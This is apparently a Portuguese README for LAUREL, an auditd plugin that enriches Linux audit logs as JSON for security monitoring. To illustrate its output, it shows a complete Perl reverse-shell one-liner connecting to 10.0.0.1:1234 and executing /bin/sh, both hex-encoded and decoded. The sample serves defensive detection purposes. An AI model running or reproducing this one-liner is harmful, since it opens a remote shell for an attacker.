
Transforme logs de auditoria do Linux para uso em SIEM
LAUREL é um plugin de pós-processamento de eventos para auditd(8) que gera logs de auditoria baseados em JSON, úteis e enriquecidos, adequados para configurações modernas de monitoramento de segurança.
A documentação correspondente à última versão estável pode ser encontrada aqui.
TLDR: Em vez de eventos de auditoria que se parecem com isso…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…LAUREL os transforma em logs JSON onde a bagunça que atacantes/testadores de penetração/equipes vermelhas estão tentando fazer se torna aparente à primeira vista:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
Isso acontece na origem porque LAUREL é executado no host onde os eventos de auditoria são gerados. Os eventos são enriquecidos com informações úteis sobre o processo pai (ppid):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Detalhes de configuração e operacionais são descritos na página de manual laurel(8). Detalhes sobre o formato de log e as justificativas podem ser encontrados na página de manual laurel-about(7). A página laurel-audit-rules(7) contém conselhos e exemplos para configurar regras de auditoria úteis para detectar táticas de atacantes.
As instruções de instalação do LAUREL contêm instruções sobre como compilar o LAUREL a partir do código-fonte e como instalá-lo e configurá-lo.
Desenvolvemos o LAUREL porque não estávamos satisfeitos com os conjuntos de recursos e características de desempenho de projetos e produtos existentes. Consulte o documento Performance para obter detalhes.
GNU General Public License, versão 3
O logotipo foi criado por Birgit Meyer <[email protected]>.